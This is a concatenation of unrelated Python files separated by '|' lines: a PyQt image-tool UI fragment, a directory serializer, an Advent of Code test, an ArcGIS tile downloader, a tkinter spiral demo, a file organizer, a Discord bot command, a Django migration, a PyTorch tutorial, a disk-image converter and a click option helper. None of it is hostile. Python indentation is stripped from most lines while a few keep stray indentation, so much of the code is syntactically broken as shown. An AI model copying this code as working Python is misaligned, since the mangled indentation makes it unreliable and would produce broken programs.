font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
self.labelRotate.setFont(font)
self.labelRotate.setObjectName("labelRotate")
# Spinbox for selecting degrees of rotation
self.spinDegrees = QtWidgets.QSpinBox(self.frameRotate)
self.spinDegrees.setGeometry(QtCore.QRect(160, 30, 71, 31))
self.spinDegrees.setObjectName("spinDegrees")
self.spinDegrees.setMinimum(-360)
self.spinDegrees.setMaximum(360)
# Label for degree selection
self.labelDegrees = QtWidgets.QLabel(self.frameRotate)
self.labelDegrees.setGeometry(QtCore.QRect(10, 29, 161, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.labelDegrees.setFont(font)
self.labelDegrees.setObjectName("labelDegrees")
# Rotation Button
self.buttonRotate = QtWidgets.QPushButton(self.frameRotate)
self.buttonRotate.setGeometry(QtCore.QRect(250, 30, 111, 31))
self.buttonRotate.setObjectName("ButtonRotate")
# ----- Buttons ----- #
# Help Button -> Produces pop-up window with tab information
self.buttonHelp2 = QtWidgets.QPushButton(self.tabConfig)
self.buttonHelp2.setGeometry(QtCore.QRect(440, 240, 71, 41))
self.buttonHelp2.setObjectName("buttonHelp2")
# Reset Button -> Resets image to original state
self.buttonReset = QtWidgets.QPushButton(self.tabConfig)
self.buttonReset.setGeometry(QtCore.QRect(520, 240, 71, 41))
self.buttonReset.setObjectName("buttonReset")
    # Apply Button -> Applies all channel, rotation, crop and downsampling settings to the original image.
self.buttonApply = QtWidgets.QPushButton(self.tabConfig)
self.buttonApply.setGeometry(QtCore.QRect(600, 240, 71, 41))
self.buttonApply.setObjectName("buttonApply")
# Continue Button -> Save all settings and proceed to variogram analysis tab
self.buttonContinue2 = QtWidgets.QPushButton(self.tabConfig)
self.buttonContinue2.setGeometry(QtCore.QRect(680, 240, 101, 41))
self.buttonContinue2.setObjectName("buttonContinue2")
# ----- Image Stack Frame ----- #
# Sets up the stack frame, which includes stack-based processing functionality.
self.frameStack = QtWidgets.QFrame(self.tabConfig)
self.frameStack.setGeometry(QtCore.QRect(10, 240, 421, 41))
self.frameStack.setFrameShape(QtWidgets.QFrame.Panel)
self.frameStack.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameStack.setLineWidth(2)
self.frameStack.setObjectName("frameStack")
# Label for stack frame
self.labelStack = QtWidgets.QLabel(self.frameStack)
self.labelStack.setGeometry(QtCore.QRect(10, 0, 201, 41))
font = QtGui.QFont()
font.setPointSize(13)
self.labelStack.setFont(font)
self.labelStack.setObjectName("labelStack")
# Slider to choose which image to display from a stack
self.sliderStack = QtWidgets.QSlider(self.frameStack)
self.sliderStack.setGeometry(QtCore.QRect(220, 0, 191, 41))
self.sliderStack.setMaximum(10)
self.sliderStack.setOrientation(QtCore.Qt.Horizontal)
self.sliderStack.setObjectName("sliderStack")
|
from __future__ import annotations  # lets from_dictionary's return annotation reference dsDirectory before the class is fully defined
import os, datetime, json
from dsFile import dsFile
class dsDirectory:
def __init__(self, path = "", new_base_path = ""):
self.path = path
self.files = []
self.subdirs = []
self.basepath = path
self.last_updated = '1900-01-01'
if new_base_path != "":
self.basepath = new_base_path
def print(self, indent: str = ""):
for fi in self.files:
print("%s%s (%s) (%s)" % (indent, fi.path, fi.get_relative_path(), fi.basepath))
for di in self.subdirs:
new_indent = indent + "----"
print("%s [%s]" % (new_indent, di.path))
di.print(new_indent)
def get_relative_path(self) -> str:
return self.path.replace(self.basepath, '')
def update(self):
self.files = []
self.subdirs = []
files=os.listdir(self.path)
files.sort()
for f in files:
            c_path = os.path.join(self.path, f)
if os.path.isfile(c_path) == True:
newfile = dsFile(c_path, self.basepath)
newfile.basepath = self.basepath
self.files.append(newfile)
else:
newsubdir = dsDirectory(c_path, self.basepath)
newsubdir.update()
self.subdirs.append(newsubdir)
self.last_updated = datetime.date.today()
def to_dictionary(self) -> dict:
container = {}
container['path'] = self.path
container['basepath'] = self.basepath
        container['last_updated'] = str(self.last_updated)  # date -> string so json.dumps can serialize it
filelist = []
subdirlist = []
for f in self.files:
            filelist.append(f.to_list())
for d in self.subdirs:
            subdirlist.append(d.to_dictionary())  # keep nested dicts so serialize() does not double-encode them
container['files'] = filelist
container['subdirs'] = subdirlist
return container
@staticmethod
def from_dictionary(data: dict) -> dsDirectory:
return_object = dsDirectory(data['path'], data['basepath'])
return_object.last_updated = data['last_updated']
for f in data["files"]:
return_object.files.append(dsFile.from_list(f))
for d in data['subdirs']:
return_object.subdirs.append(dsDirectory.from_dictionary(d))
return return_object
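    # A minimal round-trip sketch (the path is hypothetical): scan a directory,
    # serialize it to JSON, then rebuild the tree from that JSON.
    #   tree = dsDirectory(r"C:\data"); tree.update()
    #   clone = dsDirectory.from_dictionary(json.loads(tree.serialize()))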
def serialize(self) -> str:
return_dict = self.to_dictionary()
return json.dumps(return_dict) |
import pytest
from year_2020.day25.combo_breaker import (
get_encryption_key,
get_loop_size,
)
def test_get_encryption_key():
assert get_encryption_key(5764801, 17807724) == 14897079
@pytest.mark.parametrize("public_key, expected", [(17807724, 11), (5764801, 8)])
def test_get_loop_size(public_key, expected):
assert get_loop_size(public_key) == expected
|
import inspect
class _ObjInfoOrigin:
""" Only one of these methods starting with 'from_' will return True. """
def _last_cls_with_name(self):
""" Get the last (bottom-most) of parent's cls that has this name in it.
:param generallibrary.ObjInfo self: """
last_cls = None
parent = self.get_parent()
if parent:
classes = [type] if parent.cls.mro is type.mro else parent.cls.mro()
for cls in classes:
if not hasattr(cls, self.name):
break
last_cls = cls
return last_cls
def from_builtin(self):
""" Get whether this attribute came from a builtin.
:param generallibrary.ObjInfo self: """
names = "fget", "fset", "fdel", "denominator", "imag", "numerator", "real", "cache_parameters"
return inspect.isbuiltin(self.obj) or getattr(self._last_cls_with_name(), "__module__", None) == "builtins" or self.name in names
def from_base(self):
""" Get whether this attribute came from one of it's cls' non-builtin bases.
Returns first base or False.
:param generallibrary.ObjInfo self: """
last_cls = self._last_cls_with_name()
return last_cls and last_cls is not getattr(self.get_parent(), "cls", None) and getattr(last_cls, "__module__", None) != "builtins"
def from_class(self):
""" Get whether this attribute came directly from it's class.
Doesn't matter if direct parent has overridden inherited attr.
Sees if bottom-most occurrence is direct parent.
# Subset of from_class_with_overrides.
:param generallibrary.ObjInfo self: """
return self._last_cls_with_name() is getattr(self.get_parent(), "cls", None)
# def from_class_with_overrides(self): # This would violate only one from_* being True rule
# """ Get whether this attribute is defined by it's direct parent, even if a base class has it.
#
# :param generallibrary.ObjInfo self: """
# return self._last_cls_with_name() is getattr(self.get_parent(), "cls", None)
def from_instance(self):
""" Get whether this attribute came from the instance.
:param generallibrary.ObjInfo self: """
parent = self.get_parent()
return bool(parent and parent.is_instance() and not self._last_cls_with_name())
def from_module(self):
""" Get whether this attribute's parent is a module.
:param generallibrary.ObjInfo self: """
parent = self.get_parent()
return bool(parent and parent.is_module())
|
import os
import glob
import tqdm
import time
import json
import arcgis
import requests
import exceptions
class Downloader:
def __init__(self, token, mapserver_url):
self.token = token
self.headers = {"Authorization": f"Bearer {self.token}"}
self.mapserver_url = mapserver_url
def download(self, shapefile, levels):
featureset = self._shapefile_to_featureset(shapefile)
result = self._estimate_export_tiles_size(featureset, levels)
print(f"Total tiles to export: {result['totalTilesToExport']}")
print(f"Estimated download size: {result['totalSize']/1000}KB")
url = self._export_tiles(featureset, levels)
        folder_name = os.path.splitext(os.path.basename(shapefile))[0]
item_folder_path = f"tiles/{folder_name}"
tpk_folder_path = f"tiles/{folder_name}/tpk"
os.mkdir(item_folder_path)
os.mkdir(tpk_folder_path)
self._download_tpk(url, f"{tpk_folder_path}/layer.tpk")
return f"{tpk_folder_path}/layer.tpk"
def _result_handler(self, response):
try:
job = response.json()['jobId']
results = self._get_job_results(job)
return results['value']
except KeyError:
self._exception_handler(response)
def _exception_handler(self, response):
error = response.json()['error']
if error["code"] == 498:
raise exceptions.InvalidTokenException
def _estimate_export_tiles_size(self, featureset, levels):
data = {"f": "json",
"storageFormatType": "Compact",
"tilePackage": "true",
"exportExtent": "DEFAULT",
"exportBy": "levelId",
"levels": levels,
"areaOfInterest": featureset.to_json}
response = requests.post(
f"{self.mapserver_url}/estimateExportTilesSize", data=data, headers=self.headers)
return self._result_handler(response)
def _export_tiles(self, featureset, levels):
data = {"f": "json",
"storageFormatType": "Compact",
"tilePackage": "true",
"exportExtent": "DEFAULT",
"optimizeTilesForSize": "false",
"compressionQuality": "",
"exportBy": "levelId",
"levels": levels,
"areaOfInterest": featureset.to_json}
response = requests.post(
f"{self.mapserver_url}/exportTiles", data=data, headers=self.headers)
return self._result_handler(response)
def _get_job_status(self, job):
parameters = {"f": "json"}
response = requests.get(
f"{self.mapserver_url}/jobs/{job}", params=parameters, headers=self.headers)
status = response.json()
return status
def _get_job_results(self, job):
status = self._get_job_status(job)
while(status['jobStatus'] in ["esriJobSubmitted", "esriJobExecuting", "esriJobWaiting"]):
status = self._get_job_status(job)
time.sleep(1)
if(status['jobStatus'] == "esriJobSucceeded"):
parameters = {"f": "json"}
response = requests.get(
f"{self.mapserver_url}/jobs/{job}/results/out_service_url", params=parameters, headers=self.headers)
return response.json()
else:
raise exceptions.JobFailedException(status)
def _download_tpk(self, url, filename, attempt=1):
parameters = {"f": "json"}
response = requests.get(url, params=parameters, headers=self.headers)
for item in response.json()['files']:
file_size = int(requests.head(
item['url']).headers["Content-Length"])
bar = tqdm.tqdm(total=file_size, unit='B',
unit_scale=True, desc=filename)
with open(filename, "wb") as tpk:
response = requests.get(
item['url'], headers=self.headers, stream=True)
for chunk in response.iter_content(chunk_size=4096):
if chunk:
tpk.write(chunk)
                        bar.update(len(chunk))
bar.close()
if file_size == os.path.getsize(filename):
print("File downloaded successfully!")
else:
if attempt > 2:
raise exceptions.DownloadFailedException(
f"Couldn't download {filename}")
else:
print("Download failed unexpectedly, trying again...")
self._download_tpk(url, filename, attempt=attempt + 1)
def _shapefile_to_featureset(self, shapefile):
return arcgis.features.GeoAccessor.from_featureclass(shapefile).spatial.to_featureset()
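# A minimal usage sketch; the token, MapServer URL, shapefile path and level range
# below are placeholders rather than values from the original project, and the
# local "tiles/" directory is assumed to exist before download() is called.
if __name__ == "__main__":
    downloader = Downloader(
        token="<arcgis-access-token>",
        mapserver_url="https://example.com/arcgis/rest/services/Basemap/MapServer")
    tpk_path = downloader.download("shapefiles/area_of_interest.shp", levels="0-12")
    print(f"Tile package saved to {tpk_path}")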
|
from .sift import *
|
import tkinter as tk
from PIL import Image, ImageTk
from math import sin, cos, radians
from timeit import default_timer as timer
def circle_cords(tetha):
    # Maps an angle (in degrees) to a point on a slowly expanding spiral:
    # the radius grows by one pixel for every 10 degrees swept.
    print(tetha)
    r = tetha // 10
    return int(cos(radians(tetha%360))*r), int(sin(radians(tetha%360))*r)
class StatusBar(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
self.label = tk.Label(self, bd=1, relief=tk.SUNKEN, anchor=tk.W)
self.label.pack(fill=tk.X)
def set(self, text):
self.label.config(text=text)
self.label.update_idletasks()
def clear(self):
self.label.config(text="")
self.label.update_idletasks()
class Display(tk.Frame):
def __init__(self, parent, width=400, height=400, image: Image=None):
tk.Frame.__init__(self, parent)
self.parent = parent
self._delta_time = timer()
self.default_width = width
self.default_height = height
self._canvas = tk.Canvas(self.parent, width=width, height=height)
self._canvas.pack()
if image is None:
self.image = Image.new(mode='RGBA', size=(width + 1, height + 1), color=(0, 0, 0, 255))
else:
self.image = image
self._tk_image = ImageTk.PhotoImage(self.image)
self._c_image = self._canvas.create_image(0, 0, anchor=tk.NW, image=self._tk_image)
self.status_bar = StatusBar(self.parent)
self.status_bar.pack(side=tk.BOTTOM, fill=tk.X)
# update handler
# self.update_handler = None
self.tetha = 0
self.update_clock()
def update_display(self, delta_time):
# self.update_handler
# r = self.tetha
# g = 0
# b = 0
# if self.tetha > 255:
# r = 255
# g = self.tetha - 255
# if self.tetha > 510:
# r = 255
# g = 255
# b = self.tetha - 510
# if b == 255:
# self.tetha = 0
#
# color = (r, g, b)
x, y = circle_cords(self.tetha)
x += self.default_width // 2
y += self.default_height // 2
# aux = self.image.copy()
aux = self.image
aux.putpixel((x, y), (255, 255, 255, 255))
self._tk_image = ImageTk.PhotoImage(aux.copy())
self._canvas.itemconfigure(self._c_image, image=self._tk_image)
self.status_bar.set("FPS: {:.5}".format(1 / delta_time))
if self.tetha < 2514:
self.tetha += 1
else:
self.image.save('images/im.png', 'PNG')
self.tetha = 0
def update_clock(self):
delta_time = timer() - self._delta_time
self.update_display(delta_time)
self._delta_time = timer()
self.parent.after(20, self.update_clock)
if __name__ == "__main__":
w = 400
h = 400
# im.png = Image.new(mode='RGBA', size=(w + 1, h + 1), color=(255, 0, 0, 255))
im = Image.open("images/im1_2018-07-11_11:43:01.png")
w, h = im.size
root = tk.Tk()
Display(root, width=w, height=h, image=im).pack()
root.mainloop()
|
import os
from pathlib import Path
from sys import argv
# Directory to File extensions
dir_to_extns = {
"Audios": ["wav", "mp3", "wma", "aac"],
"Images": ["jpg", "jpeg", "bmp", "png", "gif", "tiff"],
"Videos": ["mp4", "mpeg4", "mkv", "avi", "wmv", "flv"],
"Documents": ["pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "odt", "ods", "txt", "csv", "tsv"],
"Codes": ["py", "c", "cpp", "js"],
"Applications": ["exe", "msi", "deb", "rpm"]
}
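# For example, Path("holiday.JPG").suffix[1:].lower() == "jpg", so that file
# would be moved into the "Images" folder by the loop below.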
if len(argv) != 2:
if os.name == "nt":
print("[ERROR] Usage: python organize.py C:\path\to\directory")
else:
print("[ERROR] Usage: python organize.py /path/to/directory")
exit(1)
# Source directory which needs to be organized
src = Path(argv[1])
if not src.exists():
print(f"[ERROR]: '{src}' does NOT exist!")
exit(1)
if not src.is_dir():
print(f"[ERROR]: '{src}' is NOT a directory!")
exit(1)
# Files in source directory
files = [item for item in src.iterdir() if item.is_file()]
# Create Directory to Files dictionary
dir_to_files = {}
for directory, extensions in dir_to_extns.items():
dir_to_files[directory] = [file for file in files if file.suffix[1:].lower() in extensions]
# Organize source directory
for directory, files in dir_to_files.items():
dst = src / directory # destination
for file in files:
if not dst.is_dir():
dst.mkdir()
file.rename(dst / file.name)
|
import discord
from discord.ext import commands
import random
class Admin(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
async def prefix(self, ctx, *, arg):
if ctx.author.id == ctx.guild.owner.id or ctx.author.id == 153699972443799552:
member = ctx.author
            # Use a parameterized query so the prefix value cannot inject SQL.
            await self.client.pool.execute('UPDATE guilds SET prefix = $1 WHERE guild_id = $2', str(arg), ctx.guild.id)
await ctx.send(f'{ctx.guild.name} prefix changed to {arg}')
print('Prefix changed')
else:
await ctx.send(f'Only the server owner, {ctx.guild.owner.name}, can change the prefix.')
def setup(client):
client.add_cog(Admin(client))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-05-18 03:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mooringlicensing', '0115_merge_20210517_0953'),
]
operations = [
migrations.AlterField(
model_name='approval',
name='expiry_date',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='approval',
name='start_date',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='globalsettings',
name='key',
field=models.CharField(choices=[('dcv_permit_template_file', 'DcvPermit template file'), ('dcv_admission_template_file', 'DcvAdmission template file'), ('approval_template_file', 'Approval template file')], max_length=255),
),
]
|
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# 1 input image channel, 6 output channels, 5x5 square convolution kernel
# Implements network described at http://pytorch.org/tutorials/_images/mnist.png
        # TODO: How did they a) arrive at that architecture (arbitrary numbers?)
# b)
self.conv1 = nn.Conv2d(1, 6, 5)
self.conv2 = nn.Conv2d(6, 16, 5)
        # fc stands for "fully connected" (an affine/linear layer)
self.fc1 = nn.Linear(16 * 5 * 5, 120) # an affine operation: y = Wx + b
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2)) # Max pooling over a (2, 2) window
x = F.max_pool2d(F.relu(self.conv2(x)), 2) # If the size is a square you can only specify a single number
x = x.view(-1, self.num_flat_features(x))
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
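    # Note (equivalent alternative): torch.flatten(x, start_dim=1), or
    # x.view(x.size(0), -1), flattens everything except the batch dimension
    # and can replace the num_flat_features helper.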
net = Net()
print(net)
input = Variable(torch.randn(1, 1, 32, 32))
out = net(input)
print(out)
net.zero_grad()
out.backward(torch.randn(1, 10))
output = net(input)
target = Variable(torch.arange(1., 11.)).view(1, -1)  # a dummy target, for example; arange replaces the deprecated torch.range and the view matches the output shape
criterion = nn.MSELoss()
loss = criterion(output, target)
print(loss)
net.zero_grad() # zeroes the gradient buffers of all parameters
print('conv1.bias.grad before backward')
print(net.conv1.bias.grad)
loss.backward()
print('conv1.bias.grad after backward')
print(net.conv1.bias.grad)
# print(loss.creator) # MSELoss
# print(loss.creator.previous_functions[0][0]) # Linear
# print(loss.creator.previous_functions[0][0].previous_functions[0][0]) # ReLU
|
import sys, os, struct
SINGLE_SIDED_DSK_SIZE = 360*1024
DOUBLE_SIDED_DSK_SIZE = SINGLE_SIDED_DSK_SIZE * 2
"""
IMG and DSK differ only by IMG files having one byte header
in the case of single sided IMG file the header is 01
and double sided IMG has header 02.
"""
SINGLE_SIDED_IMG_SIZE = SINGLE_SIDED_DSK_SIZE + 1
DOUBLE_SIDED_IMG_SIZE = DOUBLE_SIDED_DSK_SIZE + 1
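# e.g. a single-sided IMG file is 368 641 bytes: a 1-byte header (0x01)
# followed by 368 640 (360*1024) bytes of raw DSK data.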
class Img2Dsk(object):
def __init__(self, input_filename, output_filename):
self.input_filename = input_filename
self.output_filename = output_filename
self.contents = None
def check_size(self):
try:
self.input_file_size = os.path.getsize(self.input_filename)
except os.error:
sys.stderr.write("Could not get the size of {}".format(
self.input_filename))
sys.exit(1)
if self.input_file_size not in (SINGLE_SIDED_IMG_SIZE,
DOUBLE_SIDED_IMG_SIZE):
sys.stderr.write("{} size is not {:d}k nor {:d}k\n".format(
                self.input_filename, SINGLE_SIDED_IMG_SIZE//1024,
                DOUBLE_SIDED_IMG_SIZE//1024))
sys.exit(2)
def read_input_file(self):
try:
input_file = open(self.input_filename, "rb")
except IOError:
sys.stderr.write("Could not open input_file file {}".format(
self.input_filename))
sys.exit(1)
with input_file:
self.raw_header = input_file.read(1)
self.contents = input_file.read()
def check_header(self):
if not self.raw_header:
sys.stderr.write("Could not read header\n")
sys.exit(1)
header, = struct.unpack("b", self.raw_header)
if header * SINGLE_SIDED_DSK_SIZE + 1 != self.input_file_size:
sys.stderr.write("Warning: IMG header does not match size\n")
def write_dsk(self):
try:
output_file = open(self.output_filename, "wb")
except IOError as e:
sys.stderr.write("Failed to create file {}\n{}".format(
self.output_filename, str(e)))
sys.exit(1)
with output_file:
try:
output_file.write(self.contents)
except IOError as e:
sys.stderr.write("Failed to write to file {}\n{}".format(
self.output_filename, str(e)))
sys.exit(1)
def convert(self):
self.check_size()
self.read_input_file()
self.check_header()
self.write_dsk()
if __name__ == "__main__":
if len(sys.argv) != 3:
sys.stderr.write("Usage: python img2dsk.py source_file target_file\n")
sys.stderr.write("Convert IMG file to DSK file.\n")
sys.exit(2)
converter = Img2Dsk(sys.argv[1], sys.argv[2])
converter.convert()
|
# stdlib imports
import uuid
# third-party imports
import click
class HiddenOption(click.Option):
"""Option type that suppresses any help output.
"""
hidden = True
def get_help_record(self, ctx):
return
def multioption(options, name=None, callback=None):
"""Attaches multiple options to a command function and optionally attaches a
callback to a hidden option that's fired after parsing of the embedded
options.
"""
def decorator(f):
if callback is not None:
# this option exists mainly so that it can fire the callback and
# that means we probably don't want users to invoke it on the
# command line, accidentally or otherwise. Set its CLI flag to a
# random(ish) string and hide it from the application's help output.
f = click.option(
"--{0}".format(uuid.uuid4().hex), name,
callback=callback,
cls=HiddenOption,
)(f)
# wrap the decorated function in all embedded decorators (in reverse
# order so that they execute in the correct order at runtime).
for option in reversed(options):
f = option(f)
return f
return decorator
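# A minimal usage sketch (not part of the original module): two embedded options
# plus a callback fired once they have been parsed. The option names --name and
# --count, the parameter name "common_marker" and the greet command are hypothetical.
def _after_parse(ctx, param, value):
    click.echo("embedded options parsed")
    return value


common_options = multioption(
    [
        click.option("--name", default="world", help="Who to greet."),
        click.option("--count", default=1, type=int, help="How many times."),
    ],
    name="common_marker",
    callback=_after_parse,
)


@click.command()
@common_options
def greet(name, count, common_marker=None):
    # common_marker receives the (unused) value of the hidden option.
    for _ in range(count):
        click.echo("Hello, {0}!".format(name))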
|